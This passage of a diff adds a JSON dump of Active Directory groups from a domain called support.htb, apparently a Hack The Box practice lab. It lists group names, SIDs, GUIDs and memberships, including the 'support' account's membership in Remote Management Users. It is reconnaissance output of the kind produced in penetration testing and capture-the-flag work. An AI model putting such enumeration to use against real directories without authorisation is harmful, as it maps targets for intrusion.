+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "memberOf": [
+ "CN=Users,CN=Builtin,DC=support,DC=htb"
+ ],
+ "name": [
+ "Domain Users"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{ee3f8fd2-61df-4360-868a-a237fdaf6a3f}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-513"
+ ],
+ "sAMAccountName": [
+ "Domain Users"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12350
+ ],
+ "uSNCreated": [
+ 12348
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Domain Users,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Domain Admins"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Designated administrators of the domain"
+ ],
+ "distinguishedName": [
+ "CN=Domain Admins,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=Administrator,CN=Users,DC=support,DC=htb"
+ ],
+ "memberOf": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb",
+ "CN=Administrators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "name": [
+ "Domain Admins"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{3aeb0b4f-cc91-4c2d-805b-4ab844745e7d}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-512"
+ ],
+ "sAMAccountName": [
+ "Domain Admins"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 13069
+ ],
+ "uSNCreated": [
+ 12345
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Domain Admins,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Cert Publishers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group are permitted to publish certificates to the directory"
+ ],
+ "distinguishedName": [
+ "CN=Cert Publishers,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483644
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "memberOf": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Cert Publishers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{b8d00c3c-e1ef-4a03-b31f-1ca260e7388f}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-517"
+ ],
+ "sAMAccountName": [
+ "Cert Publishers"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "uSNChanged": [
+ 12344
+ ],
+ "uSNCreated": [
+ 12342
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Cert Publishers,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Enterprise Admins"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Designated administrators of the enterprise"
+ ],
+ "distinguishedName": [
+ "CN=Enterprise Admins,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483640
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=Administrator,CN=Users,DC=support,DC=htb"
+ ],
+ "memberOf": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb",
+ "CN=Administrators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "name": [
+ "Enterprise Admins"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{685a77ab-0815-46c8-87e7-5f6e9f400ed4}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-519"
+ ],
+ "sAMAccountName": [
+ "Enterprise Admins"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 13073
+ ],
+ "uSNCreated": [
+ 12339
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Enterprise Admins,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Schema Admins"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "Designated administrators of the schema"
+ ],
+ "distinguishedName": [
+ "CN=Schema Admins,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483640
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=Administrator,CN=Users,DC=support,DC=htb"
+ ],
+ "memberOf": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Schema Admins"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{715589b7-0bd9-4f31-9781-b4a27940716d}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-518"
+ ],
+ "sAMAccountName": [
+ "Schema Admins"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 13074
+ ],
+ "uSNCreated": [
+ 12336
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Schema Admins,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "adminCount": [
+ 1
+ ],
+ "cn": [
+ "Domain Controllers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:19:47+00:00",
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:04:16+00:00"
+ ],
+ "description": [
+ "All domain controllers in the domain"
+ ],
+ "distinguishedName": [
+ "CN=Domain Controllers,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "memberOf": [
+ "CN=Denied RODC Password Replication Group,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Domain Controllers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{e88bde74-7080-40f6-b090-214563aad25a}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-516"
+ ],
+ "sAMAccountName": [
+ "Domain Controllers"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 13088
+ ],
+ "uSNCreated": [
+ 12333
+ ],
+ "whenChanged": [
+ "2022-05-28 11:19:47+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Domain Controllers,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Domain Computers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:44+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "All workstations and servers joined to the domain"
+ ],
+ "distinguishedName": [
+ "CN=Domain Computers,CN=Users,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483646
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Domain Computers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{89d68a14-ca6e-41af-85bb-67620b444f7b}"
+ ],
+ "objectSid": [
+ "S-1-5-21-1677581083-3380853377-188903654-515"
+ ],
+ "sAMAccountName": [
+ "Domain Computers"
+ ],
+ "sAMAccountType": [
+ 268435456
+ ],
+ "uSNChanged": [
+ 12332
+ ],
+ "uSNCreated": [
+ 12330
+ ],
+ "whenChanged": [
+ "2022-05-28 11:03:43+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:03:43+00:00"
+ ]
+ },
+ "dn": "CN=Domain Computers,CN=Users,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Storage Replica Administrators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group have complete and unrestricted access to all features of Storage Replica."
+ ],
+ "distinguishedName": [
+ "CN=Storage Replica Administrators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Storage Replica Administrators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{12763118-603d-48f2-a5b6-e36c89bd02ac}"
+ ],
+ "objectSid": [
+ "S-1-5-32-582"
+ ],
+ "sAMAccountName": [
+ "Storage Replica Administrators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8232
+ ],
+ "uSNCreated": [
+ 8232
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Storage Replica Administrators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Remote Management Users"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user."
+ ],
+ "distinguishedName": [
+ "CN=Remote Management Users,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=support,CN=Users,DC=support,DC=htb"
+ ],
+ "name": [
+ "Remote Management Users"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{0b441c6c-db20-4956-be7f-b98c28bf12a2}"
+ ],
+ "objectSid": [
+ "S-1-5-32-580"
+ ],
+ "sAMAccountName": [
+ "Remote Management Users"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 12632
+ ],
+ "uSNCreated": [
+ 8231
+ ],
+ "whenChanged": [
+ "2022-05-28 11:12:04+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Remote Management Users,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Access Control Assistance Operators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group can remotely query authorization attributes and permissions for resources on this computer."
+ ],
+ "distinguishedName": [
+ "CN=Access Control Assistance Operators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Access Control Assistance Operators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{645c8c48-dfe8-47ed-90d5-b91a83f3fac6}"
+ ],
+ "objectSid": [
+ "S-1-5-32-579"
+ ],
+ "sAMAccountName": [
+ "Access Control Assistance Operators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8230
+ ],
+ "uSNCreated": [
+ 8230
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Access Control Assistance Operators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Hyper-V Administrators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group have complete and unrestricted access to all features of Hyper-V."
+ ],
+ "distinguishedName": [
+ "CN=Hyper-V Administrators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Hyper-V Administrators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{49e8340c-1673-4887-a82f-2752ee68bee0}"
+ ],
+ "objectSid": [
+ "S-1-5-32-578"
+ ],
+ "sAMAccountName": [
+ "Hyper-V Administrators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8229
+ ],
+ "uSNCreated": [
+ 8229
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Hyper-V Administrators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "RDS Management Servers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group."
+ ],
+ "distinguishedName": [
+ "CN=RDS Management Servers,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "RDS Management Servers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{f978f2c5-f3f7-48d7-917d-10b79b042851}"
+ ],
+ "objectSid": [
+ "S-1-5-32-577"
+ ],
+ "sAMAccountName": [
+ "RDS Management Servers"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8228
+ ],
+ "uSNCreated": [
+ 8228
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=RDS Management Servers,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "RDS Endpoint Servers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Servers in this group run virtual machines and host sessions where users RemoteApp programs and personal virtual desktops run. This group needs to be populated on servers running RD Connection Broker. RD Session Host servers and RD Virtualization Host servers used in the deployment need to be in this group."
+ ],
+ "distinguishedName": [
+ "CN=RDS Endpoint Servers,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "RDS Endpoint Servers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{9dd523af-5b44-4201-b02f-07838d96c8f6}"
+ ],
+ "objectSid": [
+ "S-1-5-32-576"
+ ],
+ "sAMAccountName": [
+ "RDS Endpoint Servers"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8227
+ ],
+ "uSNCreated": [
+ 8227
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=RDS Endpoint Servers,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "RDS Remote Access Servers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Servers in this group enable users of RemoteApp programs and personal virtual desktops access to these resources. In Internet-facing deployments, these servers are typically deployed in an edge network. This group needs to be populated on servers running RD Connection Broker. RD Gateway servers and RD Web Access servers used in the deployment need to be in this group."
+ ],
+ "distinguishedName": [
+ "CN=RDS Remote Access Servers,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "RDS Remote Access Servers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{6f5b5ede-dd9c-4e85-b640-b0fe3c810bfc}"
+ ],
+ "objectSid": [
+ "S-1-5-32-575"
+ ],
+ "sAMAccountName": [
+ "RDS Remote Access Servers"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8226
+ ],
+ "uSNCreated": [
+ 8226
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=RDS Remote Access Servers,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Certificate Service DCOM Access"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group are allowed to connect to Certification Authorities in the enterprise"
+ ],
+ "distinguishedName": [
+ "CN=Certificate Service DCOM Access,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Certificate Service DCOM Access"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{38793501-74e5-44a3-a70d-d7adfd8e4027}"
+ ],
+ "objectSid": [
+ "S-1-5-32-574"
+ ],
+ "sAMAccountName": [
+ "Certificate Service DCOM Access"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8225
+ ],
+ "uSNCreated": [
+ 8225
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Certificate Service DCOM Access,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Event Log Readers"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group can read event logs from local machine"
+ ],
+ "distinguishedName": [
+ "CN=Event Log Readers,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Event Log Readers"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{4a4ea108-e60e-4d0b-b619-ec2fcb50a999}"
+ ],
+ "objectSid": [
+ "S-1-5-32-573"
+ ],
+ "sAMAccountName": [
+ "Event Log Readers"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8224
+ ],
+ "uSNCreated": [
+ 8224
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Event Log Readers,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Cryptographic Operators"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members are authorized to perform cryptographic operations."
+ ],
+ "distinguishedName": [
+ "CN=Cryptographic Operators,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Cryptographic Operators"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{6187c3fb-08cc-4f26-a44d-25c7f7d66437}"
+ ],
+ "objectSid": [
+ "S-1-5-32-569"
+ ],
+ "sAMAccountName": [
+ "Cryptographic Operators"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8223
+ ],
+ "uSNCreated": [
+ 8223
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Cryptographic Operators,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "IIS_IUSRS"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Built-in group used by Internet Information Services."
+ ],
+ "distinguishedName": [
+ "CN=IIS_IUSRS,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "member": [
+ "CN=S-1-5-17,CN=ForeignSecurityPrincipals,DC=support,DC=htb"
+ ],
+ "name": [
+ "IIS_IUSRS"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{f8649a4f-7ea1-4afe-b46b-adc980900e86}"
+ ],
+ "objectSid": [
+ "S-1-5-32-568"
+ ],
+ "sAMAccountName": [
+ "IIS_IUSRS"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8222
+ ],
+ "uSNCreated": [
+ 8219
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=IIS_IUSRS,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Distributed COM Users"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members are allowed to launch, activate and use Distributed COM objects on this machine."
+ ],
+ "distinguishedName": [
+ "CN=Distributed COM Users,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Distributed COM Users"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{e1cb42ca-370a-41db-94d4-1d9ec98b3170}"
+ ],
+ "objectSid": [
+ "S-1-5-32-562"
+ ],
+ "sAMAccountName": [
+ "Distributed COM Users"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8218
+ ],
+ "uSNCreated": [
+ 8218
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Distributed COM Users,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Performance Log Users"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group may schedule logging of performance counters, enable trace providers, and collect event traces both locally and via remote access to this computer"
+ ],
+ "distinguishedName": [
+ "CN=Performance Log Users,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Performance Log Users"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{08a4fb3a-b86f-43f0-a776-f4170e25cc9a}"
+ ],
+ "objectSid": [
+ "S-1-5-32-559"
+ ],
+ "sAMAccountName": [
+ "Performance Log Users"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8217
+ ],
+ "uSNCreated": [
+ 8217
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
+ "whenCreated": [
+ "2022-05-28 11:01:56+00:00"
+ ]
+ },
+ "dn": "CN=Performance Log Users,CN=Builtin,DC=support,DC=htb"
+},{
+ "attributes": {
+ "cn": [
+ "Performance Monitor Users"
+ ],
+ "dSCorePropagationData": [
+ "2022-05-28 11:03:43+00:00",
+ "1601-01-01 00:00:01+00:00"
+ ],
+ "description": [
+ "Members of this group can access performance counter data locally and remotely"
+ ],
+ "distinguishedName": [
+ "CN=Performance Monitor Users,CN=Builtin,DC=support,DC=htb"
+ ],
+ "groupType": [
+ -2147483643
+ ],
+ "instanceType": [
+ 4
+ ],
+ "isCriticalSystemObject": [
+ true
+ ],
+ "name": [
+ "Performance Monitor Users"
+ ],
+ "objectCategory": [
+ "CN=Group,CN=Schema,CN=Configuration,DC=support,DC=htb"
+ ],
+ "objectClass": [
+ "top",
+ "group"
+ ],
+ "objectGUID": [
+ "{ad86ea99-403f-422c-a8cc-1df3a2280f1d}"
+ ],
+ "objectSid": [
+ "S-1-5-32-558"
+ ],
+ "sAMAccountName": [
+ "Performance Monitor Users"
+ ],
+ "sAMAccountType": [
+ 536870912
+ ],
+ "systemFlags": [
+ -1946157056
+ ],
+ "uSNChanged": [
+ 8216
+ ],
+ "uSNCreated": [
+ 8216
+ ],
+ "whenChanged": [
+ "2022-05-28 11:01:56+00:00"
+ ],
